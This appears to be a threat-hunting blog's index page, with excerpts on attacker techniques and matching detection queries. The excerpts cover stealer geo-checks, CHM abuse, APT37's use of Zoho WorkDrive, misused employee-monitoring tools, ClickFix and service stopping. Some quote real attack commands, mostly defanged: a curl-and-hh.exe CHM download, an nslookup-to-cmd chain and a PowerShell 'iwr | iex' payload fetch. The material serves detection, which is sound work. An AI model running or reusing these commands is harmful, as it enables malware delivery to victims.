Posts

380. Hunting for Suspicious System Language Discovery Events

Image
Hello everyone! Sometimes, even if a victim runs a malicious file, the system may still avoid compromise. One reason for this is the use of the System Location Discovery: System Language Discovery (T1614.001) technique. The point is that in some cases attackers do not want their malware to run on systems located in certain countries. Today we’ll look at an example of how attackers restrict the download of a stealer for systems that may be located in CIS countries. So, the loader for the SHub stealer targeting macOS used the following command to obtain information about the language of the compromised system: defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -qi russian The AppleEnabledInputSources key in the com.apple.HIToolbox.plist file contains information about keyboard layouts. Its contents are checked for the presence of the Russian language, which is typical for CIS systems. A good detection opportunity is suspicious...
Post a Comment
Read more

379. Hunting for Suspicious Compiled HTML Files

Image
Hello everyone! Today we’ll take a look at a technique that isn’t very common. Nevertheless, it occasionally appears in attackers’ toolkits. This is System Binary Proxy Execution: Compiled HTML File (T1218.001) . This technique is often used in the early stages of the cyberattack lifecycle. For example, attackers may distribute malicious CHM files inside archives as attachments in phishing emails. Let’s look at an example. In this case , the attackers used an archive containing a shortcut with the following command: "C:\Windows\System32\rundll32.exe" shell32.dll ShellExec_RunDLL conhost --headless cmd /c curl www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png -L""skontv&hh -d""ecompile^ . nt""v&0.ln""k In this scenario, the CHM file is downloaded from a remote web resource and extracted using Windows HTML Help ( hh.exe ), while using the -decompile argument. In the context of threat hunting, we can look for events in...
Post a Comment
Read more

378. Hunting for APT37: Zoho WorkDrive Abuse

Image
Hello everyone! Today we’ll talk about another legitimate service that attackers abuse - in this case, APT37. And of course, we’ll look at how to use this information for proactive threat hunting. So, in one of APT37’s fairly recent campaigns (we track this cluster as Squid Werewolf), they used the RESTLEAF implant, which abused Zoho WorkDrive - a cloud-based file management and collaboration platform. From a proactive hunting perspective, we can identify all network communications related to Zoho WorkDrive and then separate the legitimate events: event_type: "dnsreqwin" AND dns_rname: "workdrive.zohoexternal.com" See you soon!
Post a Comment
Read more

377. Adversaries Continue to Add Employee Monitoring Tools to Their Arsenal

Image
Hello everyone! It seems the trend is indeed being confirmed: another legitimate employee monitoring tool has ended up in the arsenal of attackers. Malwarebytes reported on a campaign in which attackers disguise Teramind installers as Zoom and Google Meet updates. Teramind is a software platform for employee monitoring and workplace activity analysis. It helps companies track and analyze user actions on computers and across networks to improve security, productivity, and compliance with corporate policies. However, attackers can use such software for unauthorized access to corporate systems. First, we can look for events related to the execution of files signed by Teramind Inc. , for example: event_type: "processcreatewin" AND proc_file_sig: "teramind" You can also check for suspicious communications with teramind[.]co : event_type: "dnsreqwin" AND dns_rname: "teramind.co" See you soon!
Post a Comment
Read more

376. Another Employee Monitoring Tool is Being Used by Attackers

Image
Hello everyone! I think we’re all used to attackers abusing remote administration tools, but it seems a new trend is emerging - the abuse of employee monitoring tools. We’ve already seen attackers use Controlio and Mipko Employee Monitor, and in a recent report by Huntress it’s noted that ransomware operators have added yet another similar tool to their arsenal - Network LookOut Net Monitor for Employees. What should you look for? For example, suspicious interaction with networklookout[.]com : event_type: "dnsreqwin" AND dns_rname: "networklookout.com" And, of course, process execution events whose metadata indicates this tool, for example: event_type: "processcreatewin" AND proc_file_productname: "Net Monitor for Employees Pro" See you soon!
Post a Comment
Read more

375. The New ClickFix Variant: Do We Really Need To Detect It?

Image
Hello everyone! Variants of the Malicious Copy and Paste technique (T1204.004) continue to remain popular among attackers. Today, we’ll look at another example and examine whether it actually affects our detection capabilities. This particular variant was shared by researchers from Microsoft Threat Intelligence . The command that the victim is prompted to execute performs a DNS query to an attacker-controlled server and parses the Name: field from the response: cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1 Despite the originality of the approach, the Name: field contains a fairly ordinary command: powershell.exe -ep bypass -w h -c "iwr hxxp://64.227.40[.]197/o -useb | iex" As you can see, there is nothing particularly novel here, and you could search for similar activity, for example, like this: event_type: "processcreatewin" AND...
Post a Comment
Read more

374. Hunting for Suspicious Service Stopping Events

Image
Hello everyone! Today we’ll take a look at the Service Stop technique (T1489) and discuss whether it’s worth hunting for its implementation. This technique is a typical behavioral marker for ransomware and wipers. If you check ATT&CK , you’ll see plenty of examples. Typically, such malware is used at the very end of the cyberattack lifecycle and is hardly a good target for proactive threat hunting. However, there are always exceptions. Let’s take a look at the Prometei botnet. During the malware installation process, it stops the WinRM service and then disables it: sc stop WinRM sc config WinRM start= disabled Why is this done? For example, it makes remote administration more difficult. Could such activity be legitimate? Of course! Therefore, this behavioral marker can be a reasonable target for proactive hunting: event_type: "processcreatewin" AND proc_file_path: "sc.exe" AND cmdline: ("winrm" AND "disabled") See you soon!
Post a Comment
Read more